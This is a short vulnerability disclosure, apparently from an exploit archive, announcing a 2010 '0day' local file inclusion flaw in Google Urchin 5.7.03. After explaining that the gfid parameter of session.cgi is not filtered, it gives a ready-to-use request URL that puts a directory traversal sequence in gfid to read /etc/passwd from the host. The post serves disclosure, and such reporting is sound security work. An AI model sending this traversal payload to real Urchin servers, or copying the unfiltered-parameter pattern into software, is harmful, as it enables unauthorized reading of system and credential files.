ExploitFixes
Google Urchin 5.7.03 LFI Vulnerability 0day 2010-12-15 17:15:07

Summary:
Google Urchin is vulnerable to a Local File Include (LFI)
vulnerability that allows arbitrary reading of files. Confirmed in
version 5.7.03 running on Linux. Issue may exist in other versions as
well.

Analysis:
During normal usage, Google Urchin creates files on disk that are then
embedded into report pages for visual data representation.
Unfortunately, an LFI vulnerability is introduced because proper
filtering is not performed. The included files live under
$INSTALL_PATH and look something like this:
data/cache/localhost/admin-1102-23087-1292412725.

"""
$ file ./data/cache/localhost/admin-1102-23087-1292412725
./data/cache/localhost/admin-1102-22410-1292411043: XML document text
$ head ./data/cache/localhost/admin-1102-23087-1292412725
<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20001102//EN"
"http://www.w3.org/TR/2000/CR-SVG-20001102/DTD/svg-20001102.dtd" [
<!ENTITY st1
"fill:none;stroke:#cccccc;stroke-width:0.25;stroke-miterlimit:4;">
]>
<!--
<?xml-stylesheet alternate="yes" href="ucss/usvg.css" type="text/css"?>
Copyright(c) 2003 Urchin Software Corporation. All rights reserved.
The svg contained herein is the property of Urchin Software
Corporation, San Diego, CA. It may not be used outside the Urchin
...
"""

A typical direct query to such a resource will look like this and is
what becomes embedded in the page:
http://127.0.0.1:9999/session.cgi?sid=3456434387-0000000003&app=urchin.cgi&action=prop&rid=13&n=10&vid=1102&dtc=0&cmd=svg&gfid=admin-1102-23087-1292412725&ie5=.svg

By simply modifying the gfid parameter in the GET request, we can tell
Urchin to read any file on the host instead, like so:
http://127.0.0.1:9999/session.cgi?sid=3456434387-0000000003&app=urchin.cgi&action=prop&rid=13&n=10&vid=1102&dtc=0&cmd=svg&gfid=../../../../../../../../../../etc/passwd&ie5=.svg

FIN
--
Kristian Erik Hermansen